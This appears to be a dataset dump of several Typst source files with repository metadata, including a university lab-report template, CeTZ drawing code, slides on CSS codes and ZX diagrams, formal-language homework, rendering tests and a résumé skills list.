let info-value(body) = {
rect(
width: 100%,
inset: (bottom: 2pt),
stroke: (bottom: 0.5pt),
text(
font: song,
size: xiaosi,
body,
),
)
}
set align(center)
set text(font: song, size: xiaosi, lang: "zh")
text(font: "Source Han Serif SC", size: xiaosan, weight: "bold")[浙江大学实验报告]
v(15pt)
table(
columns: (1fr, 51%, 1fr, 21%),
inset: 0pt,
stroke: none,
info-key("课程名称:"), info-value(course),
info-key("实验类型:"), info-value(type),
)
v(-1em)
table(
columns: (1fr, 81%),
inset: 0pt,
stroke: none,
info-key("实验项目名称:"), info-value(title),
)
v(-1em)
table(
columns: (5fr, 15%, 3fr, 33%, 3fr, 21%),
inset: 0pt,
stroke: none,
info-key("学生姓名:"), info-value(name),
info-key("专业:"), info-value(major),
info-key("学号:"), info-value(id),
)
v(-1em)
table(
columns: (7fr, 47%, 5fr, 20%),
inset: 0pt,
stroke: none,
info-key("同组学生姓名:"), info-value(collab),
info-key("指导教师:"), info-value(advisor),
)
v(-1em)
table(
columns: (4fr, 43%, 4fr, 9%, 1fr, 5%, 1fr, 5%, 1fr),
inset: 0pt,
stroke: none,
info-key("实验地点:"), info-value(location),
info-key("实验日期:"),
info-value(date-year), info-key("年"),
info-value(date-month), info-key("月"),
info-value(date-day), info-key("日"),
)
}
#let project(
title: " ",
course: " ",
author: " ",
id: " ",
collaborator: " ",
advisor: " ",
college: " ",
department: " ",
major: " ",
location: " ",
type: " ",
year: 2023,
month: 12,
day: 3,
body
) = {
// Set the document's basic properties.
// set document(author: authors.map(a => a.name), title: title)
cover(
course: course,
name: author,
college: college,
department: department,
major: major,
id: id,
advisor: advisor,
date: [#year] + " 年 " + [#month] + " 月 " + [#day] + " 日 ",
)
set page(numbering: (..numbers) => {
if numbers.pos().at(0) > 1 {
numbering("1", numbers.pos().at(0) - 1)
}
})
set text(font: "Linux Libertine", lang: "en")
// report-title(
// course: course,
// type: type,
// title: title,
// name: author,
// major: major,
// id: id,
// collab: collaborator,
// advisor: advisor,
// location: location,
// date-year: [#year],
// date-month: [#month],
// date-day: [#day],
// )
set par(
first-line-indent: 1em,
justify: true
)
set heading(numbering: "1.1 ")
set list(indent: 1em, body-indent: 1em)
set enum(indent: 1em, body-indent: 1em)
show heading: it => {
it
v(5pt)
fake-par
}
show terms: it => {
set par(first-line-indent: 0pt)
set terms(indent: 10pt, hanging-indent: 9pt)
it
fake-par
}
show raw: text.with(font: ("Lucida Sans Typewriter", "Source Han Sans HW SC"))
show raw.where(block: true): it => {
it
fake-par
}
show enum: it => {
it
fake-par
}
show list: it => {
it
fake-par
}
show figure: it => {
it
fake-par
}
show table: it => {
it
fake-par
}
body
}
#let code(
// caption: none, // content of caption bubble (string, none)
bgcolor: white, // back ground color (color)
strokecolor: black, // frame color (color)
hlcolor: auto, // color to use for highlighted lines (auto, color)
width: 100%,
radius: 3pt,
inset: 5pt,
numbers: false, // show line numbers (boolean)
stepnumber: 1, // only number lines divisible by stepnumber (integer)
numberfirstline: false, // if the firstline isn't divisible by stepnumber, force it to be numbered anyway (boolean)
numberstyle: auto, // style function to apply to line numbers (auto, style)
firstnumber: 1, // number of the first line (integer)
highlight: none, // line numbers to highlight (none, array of integer)
content
) = {
if type(hlcolor) == "auto" {
hlcolor = bgcolor.darken(10%)
}
if type(highlight) == "none" {
highlight = ()
}
block(
width: width,
fill: bgcolor,
stroke: strokecolor,
radius: radius,
inset: inset,
clip: false,
{
let (columns, align, make_row) = {
if numbers {
// line numbering requested
if type(numberstyle) == "auto" {
numberstyle = text.with(style: "italic",
slashed-zero: true,
size: .6em)
}
( ( auto, 1fr ),
( right + horizon, left ),
e => {
let (i, l) = e
let n = i + firstnumber
let n_str = if (calc.rem(n, stepnumber) == 0) or (numberfirstline and i == 0) { numberstyle(str(n)) } else { none }
(n_str + h(.5em), raw(lang: content.lang, l))
}
)
} else {
( ( 1fr, ),
( left, ),
e => {
let (i, l) = e
raw( lang:content.lang, l)
}
)
}
}
table(
stroke:none,
columns: columns,
rows: (auto,),
gutter: 0pt,
inset: 2pt,
align: (col, _) => align.at(col),
fill: (c, row) => if (row / 2 + firstnumber) in highlight { hlcolor } else { none },
..content
.text
.split("\n")
.enumerate()
.map(make_row)
.flatten()
.map(c => if c.has("text") and c.text == "" { v(1em) } else { c })
)
}
)
} |
|
https://github.com/typst/packages | https://raw.githubusercontent.com/typst/packages/main/packages/preview/cetz/0.2.0/src/drawable.typ | typst | Apache License 2.0 | #import "path-util.typ"
#import "vector.typ"
#import "util.typ"
#import "path-util.typ"
#let apply-transform(transform, drawables) = {
if type(drawables) == dictionary {
drawables = (drawables,)
}
if drawables.len() == 0 {
return ()
}
for drawable in drawables {
assert(type(drawable) != array,
message: "Expected drawable, got array: " + repr(drawable))
if drawable.type == "path" {
drawable.segments = drawable.segments.map(s => {
return (s.at(0),) + util.apply-transform(transform, ..s.slice(1))
})
} else if drawable.type == "content" {
drawable.pos = util.apply-transform(transform, drawable.pos)
} else {
panic()
}
(drawable,)
}
}
#let path(close: false, fill: none, stroke: none, segments) = {
let segments = segments
// Handle case where only one segment has been passed
if type(segments.first()) == str {
segments = (segments,)
}
if close {
segments.push(path-util.line-segment((
path-util.segment-end(segments.last()),
path-util.segment-start(segments.first()),
)))
}
return (
type: "path",
close: close,
segments: segments,
fill: fill,
stroke: stroke,
hidden: false
)
}
#let content(pos, width, height, border, body) = {
return (
type: "content",
pos: pos,
width: width,
height: height,
segments: border,
body: body,
hidden: false,
)
}
#let ellipse(x, y, z, rx, ry, fill: none, stroke: none) = {
let m = 0.551784
let mx = m * rx
let my = m * ry
let left = x - rx
let right = x + rx
let top = y + ry
let bottom = y - ry
path(
(
path-util.cubic-segment(
(x, top, z),
(right, y, z),
(x + m * rx, top, z),
(right, y + m * ry, z),
),
path-util.cubic-segment(
(right, y, z),
(x, bottom, z),
(right, y - m * ry, z),
(x + m * rx, bottom, z),
),
path-util.cubic-segment(
(x, bottom, z),
(left, y, z),
(x - m * rx, bottom, z),
(left, y - m * ry, z),
),
path-util.cubic-segment((left, y, z), (x, top, z), (left, y + m * ry, z), (x - m * rx, top, z)),
),
stroke: stroke,
fill: fill,
close: true,
)
}
#let arc(x, y, z, start, stop, rx, ry, mode: "OPEN", fill: none, stroke: none) = {
let delta = calc.max(-360deg, calc.min(stop - start, 360deg))
let num-curves = calc.max(1, calc.min(calc.ceil(calc.abs(delta) / 90deg), 4))
// Move x/y to the center
x -= rx * calc.cos(start)
y -= ry * calc.sin(start)
// Calculation of control points is based on the method described here:
// https://pomax.github.io/bezierinfo/#circles_cubic
let segments = ()
for n in range(0, num-curves) {
let start = start + delta / num-curves * n
let stop = start + delta / num-curves
let d = delta / num-curves
let k = 4 / 3 * calc.tan(d / 4)
let sx = x + rx * calc.cos(start)
let sy = y + ry * calc.sin(start)
let ex = x + rx * calc.cos(stop)
let ey = y + ry * calc.sin(stop)
let s = (sx, sy, z)
let c1 = (
x + rx * (calc.cos(start) - k * calc.sin(start)),
y + ry * (calc.sin(start) + k * calc.cos(start)),
z,
)
let c2 = (
x + rx * (calc.cos(stop) + k * calc.sin(stop)),
y + ry * (calc.sin(stop) - k * calc.cos(stop)),
z,
)
let e = (ex, ey, z)
segments.push(path-util.cubic-segment(s, e, c1, c2))
}
if mode == "PIE" and calc.abs(delta) < 360deg {
segments.push(path-util.line-segment((
path-util.segment-end(segments.last()),
(x, y, z),
path-util.segment-start(segments.first()))))
}
return path(
fill: fill,
stroke: stroke,
close: mode != "OPEN",
segments
)
}
|
https://github.com/jackkyyh/ZXCSS | https://raw.githubusercontent.com/jackkyyh/ZXCSS/main/scripts/2_encoder.typ | typst | #import "../import.typ": *
#slide(title: [CSS codes])[
/ CSS codes: stabilizer codes whose stabilizers can be divided into\ 2 types: *X-type* or *Z-type*.
]
#slide(title: [CSS codes])[
$cal(S)=angle.l Z Z I, Z I Z angle.r$
$cal(S)=angle.l Z Z, X X angle.r$
$cal(S)=angle.l Z Z Z Z, X X X X angle.r$
#pause
$cal(S)=angle.l X Z Z X I, I X Z Z X, X I X Z Z, Z X I X Z angle.r$
]
#slide(title: [CSS codes])[
#write_footer[<NAME>. (2022). Phase-free ZX diagrams are CSS codes (... or how to graphically grok the surface code). arXiv preprint arXiv:2204.14038.]
/ CSS codes: stabilizer codes whose stabilizers can be divided into\ 2 types: *X-type* or *Z-type*.
#pause
#align(center)[#cbox[Every CSS code encoder is a phase-free ZX diagram.]]
]
#slide(title: [Encoders as ZX diagrams])[
#grid(columns: (450pt, 1fr))[
Stabilizers of the *Steane code*:
#h(20pt)
#box[#grid(columns: (160pt, auto))[
#uncover(1, mode:"transparent")[$Z_1 Z_3 Z_5 Z_7\ Z_2 Z_3 Z_6 Z_7\ Z_4 Z_5 Z_6 Z_7$]
][$#uncover("1, 3-", mode:"transparent")[$X_1 X_3 X_5 X_7$]\
#uncover("1, 4-", mode:"transparent")[$X_2 X_3 X_6 X_7$]\
#uncover("1, 5-", mode:"transparent")[$X_4 X_5 X_6 X_7$]$
]]
Logical Pauli operators:
#h(20pt)
#box[#grid(columns: (160pt, auto))[
#uncover(1, mode:"transparent")[$overline(Z)=Z_1 Z_4 Z_5$]
][
#uncover("1, 6-", mode:"transparent")[$overline(X)=X_1 X_4 X_5$]
]]
][
#alternatives(position: right)[][
#image("../figs/steane/zx col 0.svg", height: 250pt)][
#image("../figs/steane/zx col 1.svg", height: 250pt)][
#image("../figs/steane/zx col 2.svg", height: 250pt)][
#image("../figs/steane/zx col 3.svg", height: 250pt)][
#image("../figs/steane/zx col.svg", height: 250pt)]
]
]
|
|
https://github.com/Myriad-Dreamin/typst.ts | https://raw.githubusercontent.com/Myriad-Dreamin/typst.ts/main/fuzzers/corpora/layout/page-number-align_00.typ | typst | Apache License 2.0 |
#import "/contrib/templates/std-tests/preset.typ": *
#show: test-page
#set page(
height: 100pt,
margin: 30pt,
numbering: "(1)",
number-align: top + right,
)
#block(width: 100%, height: 100%, fill: aqua.lighten(50%))
|
https://github.com/ofurtumi/formleg | https://raw.githubusercontent.com/ofurtumi/formleg/main/h05/H5.typ | typst | #import "@templates/ass:0.1.1": *
#show: doc => template(
project: "Homework 5",
class: "Töl301G",
doc
)
#set heading(numbering: "1a.")
= Parse trees and derivations
==
#align(center + horizon, [#image("../imgs/h5-v1-a.png", height: 100pt) $E -> T -> F -> a$])
==
#align(center + horizon, [#image("../imgs/h5-v1-b.png", height: 100pt) $E -> E + T -> T + F -> F + a -> a + a$])
==
#align(center + horizon, [#image("../imgs/h5-v1-c.png", height: 100pt) $E -> E + T -> E + T + F -> T + F + a -> F + a + a -> a + a + a$])
==
#align(center + horizon, [#image("../imgs/h5-v1-d.png", height: 100pt) $E -> T -> F -> (E) -> (T) -> (F) -> ((E)) -> ((T)) -> ((F)) -> ((a))$])
#pagebreak()
= Chomsky
#grid(columns: (1fr, 1fr, 1fr, 1fr), gutter: 16pt,
[ Lets start by adding a new state $A_0$ and a rule $A_0 -> A$ we now have the states: ],
[ Now we remove $B->epsilon$ and get: ],
[ Now we remove $A->epsilon$ and get: ],
[ Now we eliminate $A->A$ and get: ],[
$
A_0 &-> A\
A &-> B A B\
A &-> 1\
A &-> epsilon\
B &-> 00\
B &-> epsilon
$],[
$
A_0 &-> A\
A &-> B A B\
A &-> 1\
A &-> epsilon\
A &-> B A\
A &-> A B\
A &-> A\
B &-> 00\
$],[
$
A_0 &-> A\
A &-> B A B\
A &-> 1\
A &-> B A\
A &-> A B\
A &-> A\
A &-> B B\
A &-> B\
B &-> 00\
$],[
$
A_0 &-> A\
A &-> B A B\
A &-> 1\
A &-> B A\
A &-> A B\
A &-> B B\
A &-> B\
B &-> 00\
$],
[Now we eliminate $A->B$ and get:],
[Now we eliminate $A_0->A$ and get:],
[Now we eliminate all right hand variables longer than 2 and get:],
[Finally we replace terminals longer than 1 with variables and get:],[
$
A_0 &-> A\
A &-> B A B\
A &-> 1\
A &-> B A\
A &-> A B\
A &-> B B\
A &-> 00\
B &-> 00\
$],[
$
A_0 &-> B A B\
A_0 &-> 1\
A_0 &-> B A\
A_0 &-> A B\
A_0 &-> B B\
A_0 &-> 00\
A &-> B A B\
A &-> 1\
A &-> B A\
A &-> A B\
A &-> B B\
A &-> 00\
B &-> 00\
$],[
$
A_0 &-> B X\
A_0 &-> 1\
A_0 &-> B A\
A_0 &-> A B\
A_0 &-> B B\
A_0 &-> 00\
A &-> B X\
A &-> 1\
A &-> B A\
A &-> A B\
A &-> B B\
A &-> 00\
B &-> 00\
X &-> A B\
$],[
$
A_0 &-> B X\
A_0 &-> 1\
A_0 &-> B A\
A_0 &-> A B\
A_0 &-> B B\
A_0 &-> 00\
A &-> B X\
A &-> 1\
A &-> B A\
A &-> A B\
A &-> B B\
A &-> Y Y\
B &-> Y Y\
X &-> A B\
Y &-> 0
$]
)
Final form:
$
A_0 &-> B X | B A | A B | B B | Y Y | 1\
A &-> B X | B A | A B | B B | Y Y | 1\
B &-> Y Y\
X &-> A B\
Y &-> 0
$
#pagebreak()
= Show that i,j,k apples are context free
We can show that this is context free by creating a CFG that generates the language.
We start by creating a CFG for the left hand side apples, we want to be able to get infinate or none apples and finally end on a plus that leads into the right hand side. Well say that $S -> a A$ and $A -> a A | B$
Now lets do the right hand side, it's similar to the left side, infinate or none apples but now we want the number of apples to match or be greater than the right side of $=$. We start by defining a new transition $S -> + a B$ and define $B -> a B a | a B | =$
We end up with the following CFG:
$
S &-> a A\
S &-> + a B\
A &-> a A\
A &-> + B\
B &-> a B\
B &-> a B a \
B &-> =
$
|
|
https://github.com/Myriad-Dreamin/typst.ts | https://raw.githubusercontent.com/Myriad-Dreamin/typst.ts/main/fuzzers/corpora/visualize/gradient-text_01.typ | typst | Apache License 2.0 |
#import "/contrib/templates/std-tests/preset.typ": *
#show: test-page
// Test that gradient fills on text work for globally defined gradients.
#set page(width: 200pt, height: auto, margin: 10pt, background: {
rect(width: 100%, height: 30pt, fill: gradient.linear(red, blue))
})
#set par(justify: true)
#set text(fill: gradient.linear(red, blue))
#lorem(30)
|
https://github.com/Gavinok/typst-res | https://raw.githubusercontent.com/Gavinok/typst-res/master/skills.typ | typst | #import "layout.typ": skill_set
#skill_set("Programming Languages")[
Java, C++, Python, TypeScript, Bash, Common Lisp, Clojure, and ClojureScript
]
#skill_set("Office Software")[
Adobe Photoshop, Inkscape, Blender, and Microsoft Office
]
#skill_set("Frameworks and Databases")[
Agile,
Selenium,
CRUD,
JUnit,
Jest,
Mokito,
React,
Postgres,
and SQLite
]
#skill_set("Tools")[
Git,
Linux,
Jenkins,
Docker,
docker-compose,
Kubernetes,
Jira,
Gradle,
CMake,
Maven,
NodeJS,
GNU Make,
Vim,
Gitlab,
Github,
Wireshark,
and GDB
]
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.